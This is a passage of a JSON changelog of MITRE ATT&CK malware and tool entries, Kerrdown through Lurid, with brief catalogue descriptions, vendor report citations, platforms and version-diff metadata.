Retrieved July 17, 2018.", + "url": "https://researchcenter.paloaltonetworks.com/2017/05/unit42-kazuar-multiplatform-espionage-backdoor-api-access/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Kazuar" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "macOS" + ], + "x_mitre_version": "1.3", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:19.859000+00:00\", \"old_value\": \"2025-04-16 20:38:07.739000+00:00\"}}}", + "previous_version": "1.3" + }, + { + "type": "malware", + "id": "malware--8c1d01ff-fdc0-4586-99bd-c248e0761af5", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-03-02 13:38:32.673000+00:00", + "modified": "2025-04-25 14:43:59.023000+00:00", + "name": "Kerrdown", + "description": "[Kerrdown](https://attack.mitre.org/software/S0585) is a custom downloader that has been used by [APT32](https://attack.mitre.org/groups/G0050) since at least 2018 to install spyware from a server on the victim's network.(Citation: Amnesty Intl. Ocean Lotus February 2021)(Citation: Unit 42 KerrDown February 2019)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0585", + "external_id": "S0585" + }, + { + "source_name": "Amnesty Intl. Ocean Lotus February 2021", + "description": "Amnesty International. (2021, February 24). Vietnamese activists targeted by notorious hacking group. 
Retrieved March 1, 2021.", + "url": "https://www.amnestyusa.org/wp-content/uploads/2021/02/Click-and-Bait_Vietnamese-Human-Rights-Defenders-Targeted-with-Spyware-Attacks.pdf" + }, + { + "source_name": "Unit 42 KerrDown February 2019", + "description": "Ray, V. and Hayashi, K. (2019, February 1). Tracking OceanLotus\u2019 new Downloader, KerrDown. Retrieved October 1, 2021.", + "url": "https://unit42.paloaltonetworks.com/tracking-oceanlotus-new-downloader-kerrdown/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Kerrdown" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "2.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:59.023000+00:00\", \"old_value\": \"2025-04-16 20:38:21.498000+00:00\"}}}", + "previous_version": "2.0" + }, + { + "type": "malware", + "id": "malware--d6e55656-e43f-411f-a7af-45df650471c5", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-04-06 12:22:23.447000+00:00", + "modified": "2025-04-25 14:44:48.521000+00:00", + "name": "Kinsing", + "description": "[Kinsing](https://attack.mitre.org/software/S0599) is Golang-based malware that runs a cryptocurrency miner and attempts to spread itself to other hosts in the victim environment. 
(Citation: Aqua Kinsing April 2020)(Citation: Sysdig Kinsing November 2020)(Citation: Aqua Security Cloud Native Threat Report June 2021)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0599", + "external_id": "S0599" + }, + { + "source_name": "Aqua Kinsing April 2020", + "description": "Singer, G. (2020, April 3). Threat Alert: Kinsing Malware Attacks Targeting Container Environments. Retrieved April 1, 2021.", + "url": "https://blog.aquasec.com/threat-alert-kinsing-malware-container-vulnerability" + }, + { + "source_name": "Sysdig Kinsing November 2020", + "description": "Huang, K. (2020, November 23). Zoom into Kinsing. Retrieved April 1, 2021.", + "url": "https://sysdig.com/blog/zoom-into-kinsing-kdevtmpfsi/" + }, + { + "source_name": "Aqua Security Cloud Native Threat Report June 2021", + "description": "Team Nautilus. (2021, June). Attacks in the Wild on the Container Supply Chain and Infrastructure. 
Retrieved August 26, 2021.", + "url": "https://info.aquasec.com/hubfs/Threat%20reports/AquaSecurity_Cloud_Native_Threat_Report_2021.pdf?utm_campaign=WP%20-%20Jun2021%20Nautilus%202021%20Threat%20Research%20Report&utm_medium=email&_hsmi=132931006&_hsenc=p2ANqtz-_8oopT5Uhqab8B7kE0l3iFo1koirxtyfTehxF7N-EdGYrwk30gfiwp5SiNlW3G0TNKZxUcDkYOtwQ9S6nNVNyEO-Dgrw&utm_content=132931006&utm_source=hs_automation" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Kinsing" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Containers", + "Linux" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:48.521000+00:00\", \"old_value\": \"2025-04-16 20:38:37.411000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--b2d134a1-7bd5-4293-94d4-8fc978cb1cd7", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-05-06 18:10:59.143000+00:00", + "modified": "2025-04-25 14:44:27.009000+00:00", + "name": "Kivars", + "description": "[Kivars](https://attack.mitre.org/software/S0437) is a modular remote access tool (RAT), derived from the Bifrost RAT, that was used by [BlackTech](https://attack.mitre.org/groups/G0098) in a 2010 campaign.(Citation: TrendMicro BlackTech June 2017)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0437", + "external_id": "S0437" + }, + { + "source_name": "TrendMicro BlackTech June 2017", + "description": 
"Bermejo, L., et al. (2017, June 22). Following the Trail of BlackTech\u2019s Cyber Espionage Campaigns. Retrieved May 5, 2020.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Kivars" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:27.009000+00:00\", \"old_value\": \"2025-04-16 20:38:31.015000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--9abdda30-08e0-4ab1-9cf0-d447654c6de9", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-08-24 18:56:35.507000+00:00", + "modified": "2025-04-25 14:44:10.741000+00:00", + "name": "Kobalos", + "description": "[Kobalos](https://attack.mitre.org/software/S0641) is a multi-platform backdoor that can be used against Linux, FreeBSD, and Solaris. [Kobalos](https://attack.mitre.org/software/S0641) has been deployed against high profile targets, including high-performance computers, academic servers, an endpoint security vendor, and a large internet service provider; it has been found in Europe, North America, and Asia. 
[Kobalos](https://attack.mitre.org/software/S0641) was first identified in late 2019.(Citation: ESET Kobalos Feb 2021)(Citation: ESET Kobalos Jan 2021)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0641", + "external_id": "S0641" + }, + { + "source_name": "Kobalos", + "description": "(Citation: ESET Kobalos Feb 2021)(Citation: ESET Kobalos Jan 2021)" + }, + { + "source_name": "ESET Kobalos Feb 2021", + "description": "M.Leveille, M., Sanmillan, I. (2021, February 2). Kobalos \u2013 A complex Linux threat to high performance computing infrastructure. Retrieved August 24, 2021.", + "url": "https://www.welivesecurity.com/2021/02/02/kobalos-complex-linux-threat-high-performance-computing-infrastructure/" + }, + { + "source_name": "ESET Kobalos Jan 2021", + "description": "M.Leveille, M., Sanmillan, I. (2021, January). A WILD KOBALOS APPEARS Tricksy Linux malware goes after HPCs. 
Retrieved August 24, 2021.", + "url": "https://www.welivesecurity.com/wp-content/uploads/2021/01/ESET_Kobalos.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Kobalos" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Manikantan Srinivasan, NEC Corporation India", + "Pooja Natarajan, NEC Corporation India", + "Hiroki Nagahama, NEC Corporation" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:10.741000+00:00\", \"old_value\": \"2025-04-16 20:38:25.723000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--f108215f-3487-489d-be8b-80e346d32518", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-12-14 16:46:06.044000+00:00", + "modified": "2025-04-25 14:45:02.893000+00:00", + "name": "Komplex", + "description": "[Komplex](https://attack.mitre.org/software/S0162) is a backdoor that has been used by [APT28](https://attack.mitre.org/groups/G0007) on OS X and appears to be developed in a similar manner to [XAgentOSX](https://attack.mitre.org/software/S0161) (Citation: XAgentOSX 2017) (Citation: Sofacy Komplex Trojan).", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0162", + "external_id": "S0162" + }, + { + "source_name": "XAgentOSX 2017", + "description": "Robert Falcone. (2017, February 14). XAgentOSX: Sofacy's Xagent macOS Tool. 
Retrieved July 12, 2017.", + "url": "https://researchcenter.paloaltonetworks.com/2017/02/unit42-xagentosx-sofacys-xagent-macos-tool/" + }, + { + "source_name": "Sofacy Komplex Trojan", + "description": "Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26). Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.", + "url": "https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Komplex" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "macOS" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:45:02.893000+00:00\", \"old_value\": \"2025-04-16 20:38:42.776000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--2a6f4c7b-e690-4cc7-ab6b-1f821fb6b80b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:33.348000+00:00", + "modified": "2025-04-25 14:42:54.704000+00:00", + "name": "LOWBALL", + "description": "[LOWBALL](https://attack.mitre.org/software/S0042) is malware used by [admin@338](https://attack.mitre.org/groups/G0018). It was used in August 2015 in email messages targeting Hong Kong-based media organizations. (Citation: FireEye admin@338)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0042", + "external_id": "S0042" + }, + { + "source_name": "FireEye admin@338", + "description": "FireEye Threat Intelligence. (2015, December 1). 
China-based Cyber Threat Group Uses Dropbox for Malware Communications and Targets Hong Kong Media Outlets. Retrieved December 4, 2015.", + "url": "https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "LOWBALL" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:42:54.704000+00:00\", \"old_value\": \"2025-04-16 20:37:59.992000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--0efefea5-78da-4022-92bc-d726139e8883", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-03-04 17:12:37.586000+00:00", + "modified": "2025-04-25 14:42:42.534000+00:00", + "name": "Linux Rabbit", + "description": "[Linux Rabbit](https://attack.mitre.org/software/S0362) is malware that targeted Linux servers and IoT devices in a campaign lasting from August to October 2018. It shares code with another strain of malware known as Rabbot. The goal of the campaign was to install cryptocurrency miners onto the targeted servers and devices.(Citation: Anomali Linux Rabbit 2018)\n", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0362", + "external_id": "S0362" + }, + { + "source_name": "anomali-linux-rabbit", + "description": "Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot Malware Out of a Hat. 
Retrieved December 17, 2020.", + "url": "https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat" + }, + { + "source_name": "Anomali Linux Rabbit 2018", + "description": "Anomali Labs. (2018, December 6). Pulling Linux Rabbit/Rabbot Malware Out of a Hat. Retrieved March 4, 2019.", + "url": "https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Linux Rabbit" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:42:42.534000+00:00\", \"old_value\": \"2025-04-16 20:37:56.120000+00:00\"}}}", + "previous_version": "1.2" + }, + { + "type": "malware", + "id": "malware--95e2cbae-d82c-4f7b-b63c-16462015d35d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-24 17:51:35.005000+00:00", + "modified": "2025-04-25 14:44:07.137000+00:00", + "name": "LiteDuke", + "description": "[LiteDuke](https://attack.mitre.org/software/S0513) is a third stage backdoor that was used by [APT29](https://attack.mitre.org/groups/G0016), primarily in 2014-2015. 
[LiteDuke](https://attack.mitre.org/software/S0513) used the same dropper as [PolyglotDuke](https://attack.mitre.org/software/S0518), and was found on machines also compromised by [MiniDuke](https://attack.mitre.org/software/S0051).(Citation: ESET Dukes October 2019)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0513", + "external_id": "S0513" + }, + { + "source_name": "ESET Dukes October 2019", + "description": "Faou, M., Tartare, M., Dupuy, T. (2019, October). OPERATION GHOST. Retrieved September 23, 2020.", + "url": "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "LiteDuke" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:07.137000+00:00\", \"old_value\": \"2025-04-16 20:38:24.381000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--b865dded-0553-4962-a44b-6fe7863effed", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2019-07-02 12:58:09.598000+00:00", + "modified": "2025-04-25 14:44:30.421000+00:00", + "name": "LoJax", + "description": "[LoJax](https://attack.mitre.org/software/S0397) is a UEFI rootkit used by [APT28](https://attack.mitre.org/groups/G0007) to persist remote access software on targeted systems.(Citation: ESET LoJax Sept 2018)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ 
+ { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0397", + "external_id": "S0397" + }, + { + "source_name": "LoJax", + "description": "(Citation: ESET LoJax Sept 2018)" + }, + { + "source_name": "ESET LoJax Sept 2018", + "description": "ESET. (2018, September). LOJAX First UEFI rootkit found in the wild, courtesy of the Sednit group. Retrieved July 2, 2019.", + "url": "https://www.welivesecurity.com/wp-content/uploads/2018/09/ESET-LoJax.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "LoJax" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Jean-Ian Boutin, ESET" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:30.421000+00:00\", \"old_value\": \"2025-04-16 20:38:32.158000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--cb741463-f0fe-42e0-8d45-bc7e8335f5ae", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-05-14 17:31:33.707000+00:00", + "modified": "2025-04-25 14:44:41.863000+00:00", + "name": "Lokibot", + "description": "[Lokibot](https://attack.mitre.org/software/S0447) is a widely distributed information stealer that was first reported in 2015. It is designed to steal sensitive information such as usernames, passwords, cryptocurrency wallets, and other credentials. 
[Lokibot](https://attack.mitre.org/software/S0447) can also create a backdoor into infected systems to allow an attacker to install additional payloads.(Citation: Infoblox Lokibot January 2019)(Citation: Morphisec Lokibot April 2020)(Citation: CISA Lokibot September 2020)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0447", + "external_id": "S0447" + }, + { + "source_name": "Lokibot", + "description": "(Citation: Infoblox Lokibot January 2019)(Citation: Morphisec Lokibot April 2020)(Citation: Talos Lokibot Jan 2021)" + }, + { + "source_name": "Infoblox Lokibot January 2019", + "description": "Hoang, M. (2019, January 31). Malicious Activity Report: Elements of Lokibot Infostealer. Retrieved May 15, 2020.", + "url": "https://insights.infoblox.com/threat-intelligence-reports/threat-intelligence--22" + }, + { + "source_name": "Morphisec Lokibot April 2020", + "description": "Cheruku, H. (2020, April 15). LOKIBOT WITH AUTOIT OBFUSCATOR + FRENCHY SHELLCODE. Retrieved May 14, 2020.", + "url": "https://blog.morphisec.com/lokibot-with-autoit-obfuscator-frenchy-shellcode" + }, + { + "source_name": "CISA Lokibot September 2020", + "description": "DHS/CISA. (2020, September 22). Alert (AA20-266A) LokiBot Malware . Retrieved September 15, 2021.", + "url": "https://us-cert.cisa.gov/ncas/alerts/aa20-266a" + }, + { + "source_name": "Talos Lokibot Jan 2021", + "description": "Muhammad, I., Unterbrink, H.. (2021, January 6). A Deep Dive into Lokibot Infection Chain. 
Retrieved August 31, 2021.", + "url": "https://blog.talosintelligence.com/2021/01/a-deep-dive-into-lokibot-infection-chain.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Lokibot" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Daniyal Naeem, BT Security" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "2.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:41.863000+00:00\", \"old_value\": \"2025-04-16 20:38:35.363000+00:00\"}}}", + "previous_version": "2.0" + }, + { + "type": "malware", + "id": "malware--c9ccc4df-1f56-49e7-ad57-b383e1451688", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-03-01 14:07:36.692000+00:00", + "modified": "2025-04-25 14:44:40.541000+00:00", + "name": "LookBack", + "description": "[LookBack](https://attack.mitre.org/software/S0582) is a remote access trojan written in C++ that was used against at least three US utility companies in July 2019. The TALONITE activity group has been observed using [LookBack](https://attack.mitre.org/software/S0582).(Citation: Proofpoint LookBack Malware Aug 2019)(Citation: Dragos TALONITE)(Citation: Dragos Threat Report 2020)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0582", + "external_id": "S0582" + }, + { + "source_name": "LookBack", + "description": "(Citation: Proofpoint LookBack Malware Aug 2019)" + }, + { + "source_name": "Proofpoint LookBack Malware Aug 2019", + "description": "Raggi, M. Schwarz, D.. (2019, August 1). 
LookBack Malware Targets the United States Utilities Sector with Phishing Attacks Impersonating Engineering Licensing Boards. Retrieved February 25, 2021.", + "url": "https://www.proofpoint.com/us/threat-insight/post/lookback-malware-targets-united-states-utilities-sector-phishing-attacks" + }, + { + "source_name": "Dragos TALONITE", + "description": "Dragos. (null). TALONITE. Retrieved February 25, 2021.", + "url": "https://www.dragos.com/threat/talonite/" + }, + { + "source_name": "Dragos Threat Report 2020", + "description": "Dragos. (n.d.). ICS Cybersecurity Year in Review 2020. Retrieved February 25, 2021.", + "url": "https://hub.dragos.com/hubfs/Year-in-Review/Dragos_2020_ICS_Cybersecurity_Year_In_Review.pdf?hsCtaTracking=159c0fc3-92d8-425d-aeb8-12824f2297e8%7Cf163726d-579b-4996-9a04-44e5a124d770" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "LookBack" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:40.541000+00:00\", \"old_value\": \"2025-04-16 20:38:35.052000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "tool", + "id": "tool--2fab555f-7664-4623-b4e0-1675ae38190b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:33:10.962000+00:00", + "modified": "2025-04-25 14:45:15.980000+00:00", + "name": "Lslsass", + "description": "[Lslsass](https://attack.mitre.org/software/S0121) is a publicly-available tool that can dump active logon session password hashes from the lsass process. 
(Citation: Mandiant APT1)", + "revoked": false, + "labels": [ + "tool" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0121", + "external_id": "S0121" + }, + { + "source_name": "Mandiant APT1", + "description": "Mandiant. (n.d.). APT1 Exposing One of China\u2019s Cyber Espionage Units. Retrieved July 18, 2016.", + "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Lslsass" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:45:15.980000+00:00\", \"old_value\": \"2025-04-16 20:38:50.784000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--54a73038-1937-4d71-a253-316e76d5413c", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-11-16 18:40:34.473000+00:00", + "modified": "2025-04-25 14:43:22.226000+00:00", + "name": "Lucifer", + "description": "[Lucifer](https://attack.mitre.org/software/S0532) is a crypto miner and DDoS hybrid malware that leverages well-known exploits to spread laterally on Windows platforms.(Citation: Unit 42 Lucifer June 2020)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0532", + "external_id": "S0532" + }, + { + "source_name": "Unit 42 Lucifer June 2020", + "description": "Hsu, K. et al. (2020, June 24). 
Lucifer: New Cryptojacking and DDoS Hybrid Malware Exploiting High and Critical Vulnerabilities to Infect Windows Devices. Retrieved November 16, 2020.", + "url": "https://unit42.paloaltonetworks.com/lucifer-new-cryptojacking-and-ddos-hybrid-malware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Lucifer" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Daniyal Naeem, BT Security" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:22.226000+00:00\", \"old_value\": \"2025-04-16 20:38:08.548000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--251fbae2-78f6-4de7-84f6-194c727a64ad", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:14.527000+00:00", + "modified": "2025-04-25 14:42:51.586000+00:00", + "name": "Lurid", + "description": "[Lurid](https://attack.mitre.org/software/S0010) is a malware family that has been used by several groups, including [PittyTiger](https://attack.mitre.org/groups/G0011), in targeted attacks as far back as 2006. (Citation: Villeneuve 2014) (Citation: Villeneuve 2011)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0010", + "external_id": "S0010" + }, + { + "source_name": "Villeneuve 2014", + "description": "Villeneuve, N., Homan, J. (2014, July 31). Spy of the Tiger. 
